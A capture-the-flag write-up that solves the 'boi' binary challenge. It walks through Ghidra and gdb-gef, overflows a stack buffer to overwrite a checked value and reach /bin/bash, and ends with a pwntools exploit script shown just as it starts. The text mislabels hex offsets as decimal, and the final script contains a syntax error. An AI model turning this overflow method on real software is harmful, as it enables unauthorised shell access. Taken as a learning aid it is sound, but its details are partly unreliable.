+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.111.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 8792 (8.6K) [application/octet-stream]
+ Saving to: ‘boi’
+
+ boi 100%[===============================================================================>] 8.59K --.-KB/s in 0s
+
+ 2021-02-22 21:57:41 (31.4 MB/s) - ‘boi’ saved [8792/8792]
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → file boi
+ boi: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=1537584f3b2381e1b575a67cba5fbb87878f9711, not stripped
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → chmod +x boi
+
+
+
+` ![]()
+
+## Solution
+
+first things first, let's execute the binary to see what it does:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → ./boi
+ Are you a big boiiiii??
+ yes
+ Tue 23 Feb 2021 08:53:13 AM CET
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → ./boi
+ Are you a big boiiiii??
+ no
+ Tue 23 Feb 2021 08:53:17 AM CET
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → date
+ Tue 23 Feb 2021 08:53:22 AM CET
+
+
+it seems the binary checks for our input, and then executes a command, in this case it's 'date' let's use pwn to check the security of that binary:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → pwn checksec boi
+ [*] '/home/nothing/binexp/2/boi'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: Canary found
+ NX: NX enabled
+ PIE: No PIE (0x400000)
+
+
+here we see that this is a 64bit binary with a Stack Canary, and a non-executable stack (which are 2 binary mitigations). Let's take a look at it with ghidra:
+
+
+
+which gives us the following code for the main function:
+
+
+ undefined8 main(void)
+
+ {
+ long in_FS_OFFSET;
+ undefined8 local_38;
+ undefined8 local_30;
+ undefined4 local_28;
+ int iStack36;
+ undefined4 local_20;
+ long local_10;
+
+ local_10 = *(long *)(in_FS_OFFSET + 0x28);
+ local_38 = 0;
+ local_30 = 0;
+ local_20 = 0;
+ local_28 = 0;
+ iStack36 = -0x21524111;
+ puts("Are you a big boiiiii??");
+ read(0,&local;_38,0x18);
+ if (iStack36 == -0x350c4512) {
+ run_cmd("/bin/bash");
+ }
+ else {
+ run_cmd("/bin/date");
+ }
+ if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
+ /* WARNING: Subroutine does not return */
+ __stack_chk_fail();
+ }
+ return 0;
+ }
+
+
+
+Now in this main function, we see that our text input gets put into the local_38 variable, however there is something else here, there is an if statement, that wants the iStack36 value to be equal to a certain hexadecimal value. if it is not equal to that hex value, it will print out the date like we saw earlier, if it is actually the correct hex value, it will run /bin/bash. The important thing to note here is that the binary scans for 18 bytes of our data, or 18 ascii characters.
+
+Now if we look at what our iStack value is declared as we get the following:
+
+
+ iStack36 = -0x21524111;
+
+
+
+ 0040067e c7 45 e4 MOV dword ptr [RBP + local_28+0x4],0xdeadbeef
+ ef be ad de
+
+
+
+and then later on when iStack36 gets compared the second value:
+
+
+ if (iStack36 == -0x350c4512) {
+ run_cmd("/bin/bash");
+ }
+
+
+ 004006a8 3d ee ba CMP EAX,0xcaf3baee
+ f3 ca
+ 004006ad 75 0c JNZ LAB_004006bb
+ 004006af bf 7c 07 MOV EDI=>s_/bin/bash_0040077c,s_/bin/bash_0040077c = "/bin/bash"
+ 40 00
+ 004006b4 e8 6d ff CALL run_cmd undefined run_cmd()
+ ff ff
+
+
+
+so, iStack36 first gets assignd the 0xdeadbeef value, and then it gets compared to 0xcaf3baee. Now the next step is to look at the stack layout in ghidra, you can click on any variable where they are declared:
+
+
+
+
+ **************************************************************
+ * FUNCTION *
+ **************************************************************
+ undefined main()
+ undefined AL:1
+ undefined8 Stack[-0x10]:8 local_10 XREF[2]: 00400659(W),
+ 004006ca(R)
+ undefined4 Stack[-0x20]:4 local_20 XREF[1]: 00400677(W)
+ undefined8 Stack[-0x28]:8 local_28 XREF[1,2]: 0040066f(W),
+ 0040067e(W),
+ 004006a5(R)
+ undefined8 Stack[-0x30]:8 local_30 XREF[1]: 00400667(W)
+ undefined8 Stack[-0x38]:8 local_38 XREF[2]: 0040065f(W),
+ 0040068f(*)
+ undefined4 Stack[-0x3c]:4 local_3c XREF[1]: 00400649(W)
+ undefined8 Stack[-0x48]:8 local_48 XREF[1]: 0040064c(W)
+ main XREF[5]: Entry Point(*),
+ _start:0040054d(*),
+ _start:0040054d(*), 004007b4,
+ 00400868(*)
+ 00400641 55 PUSH RBP
+
+
+
+Now according to ghidra, our input (local_38) is stored at offset -0x38 and we see that is stored at offset -0x28 this means that theres is a 0x10 byte difference between the 2 values.
+
+Since we can write 0x18 bytes or characters, that measn we can fill up the 0x10 byte difference and overwrite other values, most importantly the value being checked (iStack36). So let's take a look at it from gdb-gef :
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → gdb ./boi
+ GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
+ Copyright (C) 2021 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1.90.20210103-git using Python engine 3.9
+ Reading symbols from ./boi...
+ (No debugging symbols found in ./boi)
+ gef➤
+
+
+
+Now from here, we set a breakpoint at *0x4006a5 because this is where
+
+
+
+
+ gef➤ b *0x4006a5
+ Breakpoint 1 at 0x4006a5
+
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/boi
+ Are you a big boiiiii??
+ yes
+
+
+Here we use b to set the breakpoint, and r to run the binary, put in our text, and we get this breakpoint output:
+
+
+ Breakpoint 1, 0x00000000004006a5 in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x4
+ $rbx : 0x0
+ $rcx : 0x00007ffff7edce8e → 0x5a77fffff0003d48 ("H="?)
+ $rdx : 0x18
+ $rsp : 0x00007fffffffe0f0 → 0x00007fffffffe228 → 0x00007fffffffe500 → "/home/nothing/binexp/2/boi"
+ $rbp : 0x00007fffffffe130 → 0x00000000004006e0 → <__libc_csu_init+0> push r15
+ $rsi : 0x00007fffffffe100 → 0x000000000a736579 ("yes\n"?)
+ $rdi : 0x0
+ $rip : 0x00000000004006a5 → mov eax, DWORD PTR [rbp-0x1c]
+ $r8 : 0x18
+ $r9 : 0x00007ffff7facbe0 → 0x00000000006026a0 → 0x0000000000000000
+ $r10 : 0xfffffffffffff28b
+ $r11 : 0x246
+ $r12 : 0x0000000000400530 → <_start+0> xor ebp, ebp
+ $r13 : 0x0
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [zero CARRY parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffe0f0│+0x0000: 0x00007fffffffe228 → 0x00007fffffffe500 → "/home/nothing/binexp/2/boi" ← $rsp
+ 0x00007fffffffe0f8│+0x0008: 0x000000010040072d
+ 0x00007fffffffe100│+0x0010: 0x000000000a736579 ("yes\n"?) ← $rsi
+ 0x00007fffffffe108│+0x0018: 0x0000000000000000
+ 0x00007fffffffe110│+0x0020: 0xdeadbeef00000000
+ 0x00007fffffffe118│+0x0028: 0x0000000000000000
+ 0x00007fffffffe120│+0x0030: 0x00007fffffffe220 → 0x0000000000000001
+ 0x00007fffffffe128│+0x0038: 0xa4430c55074e2b00
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x400698 mov rsi, rax
+ 0x40069b mov edi, 0x0
+ 0x4006a0 call 0x400500
+ ●→ 0x4006a5 mov eax, DWORD PTR [rbp-0x1c]
+ 0x4006a8 cmp eax, 0xcaf3baee
+ 0x4006ad jne 0x4006bb
+ 0x4006af mov edi, 0x40077c
+ 0x4006b4 call 0x400626
+ 0x4006b9 jmp 0x4006c5
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "boi", stopped 0x4006a5 in main (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x4006a5 → main()
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤search-pattern yes
+
+
+
+
+now the thing is we can't just search-pattern the yes word we used as input, we need something more specific, so let's redo it:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → gdb ./boi
+ GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
+ Copyright (C) 2021 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1.90.20210103-git using Python engine 3.9
+ Reading symbols from ./boi...
+ (No debugging symbols found in ./boi)
+ gef➤ b *0x4006a5
+ Breakpoint 1 at 0x4006a5
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/boi
+ Are you a big boiiiii??
+ 11223344
+
+ Breakpoint 1, 0x00000000004006a5 in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x9
+ $rbx : 0x0
+ $rcx : 0x00007ffff7edce8e → 0x5a77fffff0003d48 ("H="?)
+ $rdx : 0x18
+ $rsp : 0x00007fffffffe0f0 → 0x00007fffffffe228 → 0x00007fffffffe500 → "/home/nothing/binexp/2/boi"
+ $rbp : 0x00007fffffffe130 → 0x00000000004006e0 → <__libc_csu_init+0> push r15
+ $rsi : 0x00007fffffffe100 → "11223344\n"
+ $rdi : 0x0
+ $rip : 0x00000000004006a5 → mov eax, DWORD PTR [rbp-0x1c]
+ $r8 : 0x18
+ $r9 : 0x00007ffff7facbe0 → 0x00000000006026a0 → 0x0000000000000000
+ $r10 : 0xfffffffffffff28b
+ $r11 : 0x246
+ $r12 : 0x0000000000400530 → <_start+0> xor ebp, ebp
+ $r13 : 0x0
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [zero CARRY PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffe0f0│+0x0000: 0x00007fffffffe228 → 0x00007fffffffe500 → "/home/nothing/binexp/2/boi" ← $rsp
+ 0x00007fffffffe0f8│+0x0008: 0x000000010040072d
+ 0x00007fffffffe100│+0x0010: "11223344\n" ← $rsi
+ 0x00007fffffffe108│+0x0018: 0x000000000000000a
+ 0x00007fffffffe110│+0x0020: 0xdeadbeef00000000
+ 0x00007fffffffe118│+0x0028: 0x0000000000000000
+ 0x00007fffffffe120│+0x0030: 0x00007fffffffe220 → 0x0000000000000001
+ 0x00007fffffffe128│+0x0038: 0xd7f7b092c102bd00
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x400698 mov rsi, rax
+ 0x40069b mov edi, 0x0
+ 0x4006a0 call 0x400500
+ ●→ 0x4006a5 mov eax, DWORD PTR [rbp-0x1c]
+ 0x4006a8 cmp eax, 0xcaf3baee
+ 0x4006ad jne 0x4006bb
+ 0x4006af mov edi, 0x40077c
+ 0x4006b4 call 0x400626
+ 0x4006b9 jmp 0x4006c5
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "boi", stopped 0x4006a5 in main (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x4006a5 → main()
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤ search-pattern 11223344
+ [+] Searching '11223344' in memory
+ [+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
+ 0x7fffffffe100 - 0x7fffffffe10a → "11223344\n"
+
+
+
+Now from here we used the input '11223344' and gdb managed to find where it was located, so let's get more info on the **0x7fffffffe100** adress:
+
+
+ gef➤ x/10g 0x7fffffffe100
+ 0x7fffffffe100: 0x3434333332323131 0xa
+
+ **0x7fffffffe110: 0xdeadbeef00000000 0x0**
+
+ 0x7fffffffe120: 0x7fffffffe220 0xd7f7b092c102bd00
+ 0x7fffffffe130: 0x4006e0 0x7ffff7e14d0a
+ 0x7fffffffe140: 0x7fffffffe228 0x100000000
+
+
+From that output you can see the 0xdeadbeef value appearing at the 10 bytes offset we mentionned earlier.
+
+
+ 0040067e c7 45 e4 MOV dword ptr [RBP + local_28+0x4],0xdeadbeef
+ ef be ad de
+
+
+
+Now from here we will use python to create a specific payload, since we know that our input 11223344 is 10 bytes away, we will give the input of 10 zeroes, +p32(0xcaf3baee). We need the hex address to be in 'least endian' (least significant byte first) so this means we will write caf3baee in reverse like this : ee ba f3 ca. That is because this is an ELF binary, we saw it at the beginning of this writeup, and because of how the elf will read in the data, so we have to pack it in the correct order to be read properly:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → python -c 'print "0"*0x10 + "\xee\xba\xf3\xca"' > input
+
+
+
+now here you see that we create a file called 'input' that has 10 bytes worth of 0 characters, so essentially we have 10 zero characters and then afterwards we have the caf3baee hex value written in reverse, or in 'least endian'. We will use this input to feed into our binary file, and then we will see if we successfully managed to overwrite the data we wanted:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → gdb ./boi
+
+ GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
+ Copyright (C) 2021 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1.90.20210103-git using Python engine 3.9
+ Reading symbols from ./boi...
+ (No debugging symbols found in ./boi)
+
+ gef➤ b *0x4006a5
+ Breakpoint 1 at 0x4006a5
+
+ gef➤ r < input
+ Starting program: /home/nothing/binexp/2/boi < input
+ Are you a big boiiiii??
+
+ Breakpoint 1, 0x00000000004006a5 in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x15
+ $rbx : 0x0
+ $rcx : 0x00007ffff7edce8e → 0x5a77fffff0003d48 ("H="?)
+ $rdx : 0x18
+ $rsp : 0x00007fffffffe0f0 → 0x00007fffffffe228 → 0x00007fffffffe500 → "/home/nothing/binexp/2/boi"
+ $rbp : 0x00007fffffffe130 → 0x00000000004006e0 → <__libc_csu_init+0> push r15
+ $rsi : 0x00007fffffffe100 → 0x3030303030303030 ("00000000"?)
+ $rdi : 0x0
+ $rip : 0x00000000004006a5 → mov eax, DWORD PTR [rbp-0x1c]
+ $r8 : 0x18
+ $r9 : 0x00007ffff7facbe0 → 0x00000000006026a0 → 0x0000000000000000
+ $r10 : 0xfffffffffffff28b
+ $r11 : 0x246
+ $r12 : 0x0000000000400530 → <_start+0> xor ebp, ebp
+ $r13 : 0x0
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [zero CARRY parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffe0f0│+0x0000: 0x00007fffffffe228 → 0x00007fffffffe500 → "/home/nothing/binexp/2/boi" ← $rsp
+ 0x00007fffffffe0f8│+0x0008: 0x000000010040072d
+ 0x00007fffffffe100│+0x0010: 0x3030303030303030 ← $rsi
+ 0x00007fffffffe108│+0x0018: 0x3030303030303030
+ 0x00007fffffffe110│+0x0020: 0xdeadbe0acaf3baee
+ 0x00007fffffffe118│+0x0028: 0x0000000000000000
+ 0x00007fffffffe120│+0x0030: 0x00007fffffffe220 → 0x0000000000000001
+ 0x00007fffffffe128│+0x0038: 0xeea3ebadbb735f00
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x400698 mov rsi, rax
+ 0x40069b mov edi, 0x0
+ 0x4006a0 call 0x400500
+ ●→ 0x4006a5 mov eax, DWORD PTR [rbp-0x1c]
+ 0x4006a8 cmp eax, 0xcaf3baee
+ 0x4006ad jne 0x4006bb
+ 0x4006af mov edi, 0x40077c
+ 0x4006b4 call 0x400626
+ 0x4006b9 jmp 0x4006c5
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "boi", stopped 0x4006a5 in main (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x4006a5 → main()
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+
+ gef➤ search-pattern 0000000000
+ [+] Searching '0000000000' in memory
+ [+] In '/usr/lib/x86_64-linux-gnu/libc-2.31.so'(0x7ffff7f5e000-0x7ffff7fa8000), permission=r--
+ 0x7ffff7f7fd50 - 0x7ffff7f7fd60 → "0000000000000000"
+ [+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
+ 0x7fffffffe100 - 0x7fffffffe10a → "0000000000[...]"
+
+ gef➤ x/10g 0x7fffffffe100
+ 0x7fffffffe100: 0x3030303030303030 0x3030303030303030
+ 0x7fffffffe110: 0xdeadbe0acaf3baee 0x0
+ 0x7fffffffe120: 0x7fffffffe220 0xeea3ebadbb735f00
+ 0x7fffffffe130: 0x4006e0 0x7ffff7e14d0a
+ 0x7fffffffe140: 0x7fffffffe228 0x100000000
+
+
+
+
+Here we can see at address 0x7fffffffe110 that the previous value of 0xdeadbeef got partially overwritten by our values caf3baee, with an offset of 8 hexadecimals, and for some reason we need to adjust the payload with only 4 hexadimals (from 10 to 14):
+
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [~/binexp/2]
+ → python -c 'print "0"*0x10 + "\xee\xba\xf3\xca"'
+ 0000000000000000
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [~/binexp/2]
+ → python -c 'print "0"*0x14 + "\xee\xba\xf3\xca"'
+ 00000000000000000000
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [~/binexp/2]
+ → python -c 'print "0"*0x14 + "\xee\xba\xf3\xca"' > input
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → gdb ./boi
+ GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
+ Copyright (C) 2021 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1.90.20210103-git using Python engine 3.9
+ Reading symbols from ./boi...
+ (No debugging symbols found in ./boi)
+ gef➤ b *0x4006a5
+ Breakpoint 1 at 0x4006a5
+ gef➤ r < input
+ Starting program: /home/nothing/binexp/2/boi < input
+ Are you a big boiiiii??
+
+ Breakpoint 1, 0x00000000004006a5 in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x18
+ $rbx : 0x0
+ $rcx : 0x00007ffff7edce8e → 0x5a77fffff0003d48 ("H="?)
+ $rdx : 0x18
+ $rsp : 0x00007fffffffe0f0 → 0x00007fffffffe228 → 0x00007fffffffe500 → "/home/nothing/binexp/2/boi"
+ $rbp : 0x00007fffffffe130 → 0x00000000004006e0 → <__libc_csu_init+0> push r15
+ $rsi : 0x00007fffffffe100 → 0x3030303030303030 ("00000000"?)
+ $rdi : 0x0
+ $rip : 0x00000000004006a5 → mov eax, DWORD PTR [rbp-0x1c]
+ $r8 : 0x18
+ $r9 : 0x00007ffff7facbe0 → 0x00000000006026a0 → 0x0000000000000000
+ $r10 : 0xfffffffffffff28b
+ $r11 : 0x246
+ $r12 : 0x0000000000400530 → <_start+0> xor ebp, ebp
+ $r13 : 0x0
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [zero CARRY PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffe0f0│+0x0000: 0x00007fffffffe228 → 0x00007fffffffe500 → "/home/nothing/binexp/2/boi" ← $rsp
+ 0x00007fffffffe0f8│+0x0008: 0x000000010040072d
+ 0x00007fffffffe100│+0x0010: 0x3030303030303030 ← $rsi
+ 0x00007fffffffe108│+0x0018: 0x3030303030303030
+ 0x00007fffffffe110│+0x0020: 0xcaf3baee30303030
+ 0x00007fffffffe118│+0x0028: 0x0000000000000000
+ 0x00007fffffffe120│+0x0030: 0x00007fffffffe220 → 0x0000000000000001
+ 0x00007fffffffe128│+0x0038: 0xeacf1d34e3c42300
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x400698 mov rsi, rax
+ 0x40069b mov edi, 0x0
+ 0x4006a0 call 0x400500
+ ●→ 0x4006a5 mov eax, DWORD PTR [rbp-0x1c]
+ 0x4006a8 cmp eax, 0xcaf3baee
+ 0x4006ad jne 0x4006bb
+ 0x4006af mov edi, 0x40077c
+ 0x4006b4 call 0x400626
+ 0x4006b9 jmp 0x4006c5
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "boi", stopped 0x4006a5 in main (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x4006a5 → main()
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤ search-pattern 00000000000000
+ [+] Searching '00000000000000' in memory
+ [+] In '/usr/lib/x86_64-linux-gnu/libc-2.31.so'(0x7ffff7f5e000-0x7ffff7fa8000), permission=r--
+ 0x7ffff7f7fd50 - 0x7ffff7f7fd60 → "0000000000000000"
+ [+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
+ 0x7fffffffe100 - 0x7fffffffe10e → "00000000000000[...]"
+ gef➤ x/10g 0x7fffffffe100
+ 0x7fffffffe100: 0x3030303030303030 0x3030303030303030
+ 0x7fffffffe110: 0xcaf3baee30303030 0x0
+ 0x7fffffffe120: 0x7fffffffe220 0xeacf1d34e3c42300
+ 0x7fffffffe130: 0x4006e0 0x7ffff7e14d0a
+ 0x7fffffffe140: 0x7fffffffe228 0x100000000
+
+
+
+and this time we successfully overwrote the 0xdeadbeef value with our own 0xcaf3baee value! so when we continue onto the cmp instruction related to the if statement, we can see that we actually pass the check correctly, we need to se the next breakpoint at 0x4006a8 because this is where the CMP assembly instruction is:
+
+
+
+
+ 004006a8 3d ee ba CMP EAX,0xcaf3baee
+ f3 ca
+
+ 004006ad 75 0c JNZ LAB_004006bb
+ 004006af bf 7c 07 MOV EDI=>s_/bin/bash_0040077c,s_/bin/bash_0040077c = "/bin/bash"
+ 40 00
+ 004006b4 e8 6d ff CALL run_cmd undefined run_cmd()
+ ff ff
+
+
+
+
+ gef➤ b *0x4006a8
+ Breakpoint 2 at 0x4006a8
+ gef➤ c
+ Continuing.
+
+ Breakpoint 2, 0x00000000004006a8 in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0xcaf3baee
+ $rbx : 0x0
+ $rcx : 0x00007ffff7edce8e → 0x5a77fffff0003d48 ("H="?)
+ $rdx : 0x18
+ $rsp : 0x00007fffffffe0f0 → 0x00007fffffffe228 → 0x00007fffffffe500 → "/home/nothing/binexp/2/boi"
+ $rbp : 0x00007fffffffe130 → 0x00000000004006e0 → <__libc_csu_init+0> push r15
+ $rsi : 0x00007fffffffe100 → 0x3030303030303030 ("00000000"?)
+ $rdi : 0x0
+ $rip : 0x00000000004006a8 → cmp eax, 0xcaf3baee
+ $r8 : 0x18
+ $r9 : 0x00007ffff7facbe0 → 0x00000000006026a0 → 0x0000000000000000
+ $r10 : 0xfffffffffffff28b
+ $r11 : 0x246
+ $r12 : 0x0000000000400530 → <_start+0> xor ebp, ebp
+ $r13 : 0x0
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [zero CARRY PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffe0f0│+0x0000: 0x00007fffffffe228 → 0x00007fffffffe500 → "/home/nothing/binexp/2/boi" ← $rsp
+ 0x00007fffffffe0f8│+0x0008: 0x000000010040072d
+ 0x00007fffffffe100│+0x0010: 0x3030303030303030 ← $rsi
+ 0x00007fffffffe108│+0x0018: 0x3030303030303030
+ 0x00007fffffffe110│+0x0020: 0xcaf3baee30303030
+ 0x00007fffffffe118│+0x0028: 0x0000000000000000
+ 0x00007fffffffe120│+0x0030: 0x00007fffffffe220 → 0x0000000000000001
+ 0x00007fffffffe128│+0x0038: 0xeacf1d34e3c42300
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x40069b mov edi, 0x0
+ 0x4006a0 call 0x400500
+ ● 0x4006a5 mov eax, DWORD PTR [rbp-0x1c]
+ ●→ 0x4006a8 cmp eax, 0xcaf3baee
+ 0x4006ad jne 0x4006bb
+ 0x4006af mov edi, 0x40077c
+ 0x4006b4 call 0x400626
+ 0x4006b9 jmp 0x4006c5
+ 0x4006bb mov edi, 0x400786
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "boi", stopped 0x4006a8 in main (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x4006a8 → main()
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+
+Now from here we see the cmp value is comparing the eax register to the value 0xcaf3baee, so let's check what is inside eax:
+
+
+ gef➤ p $eax
+ $1 = 0xcaf3baee
+
+
+
+So this means we should successfully pass the cmp instruction because both values are equal to 0xcaf3baee, so let's use python's pwntools to write an exploit to solve the challenge:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → ls
+ boi input
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → vim exploit.py
+
+
+
+
+ #First, import the pwntools library
+ from pwn import *
+
+ #then set the target as the ./boi process
+ target = process ('./boi')
+
+ #then create the 14 0 bytes and little endian caf3baee payload
+ payload = "0"*0x14 + + "\xee\xba\xf3\xca"
+
+ # send the payload to the process
+ target.send(payload)
+
+ #and then drop into a shell to view the result
+ target.interactive()
+
+
+
+now let's test it:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → python3 exploit.py
+ [+] Starting local process './boi': pid 9071
+ [*] Switching to interactive mode
+ Are you a big boiiiii??
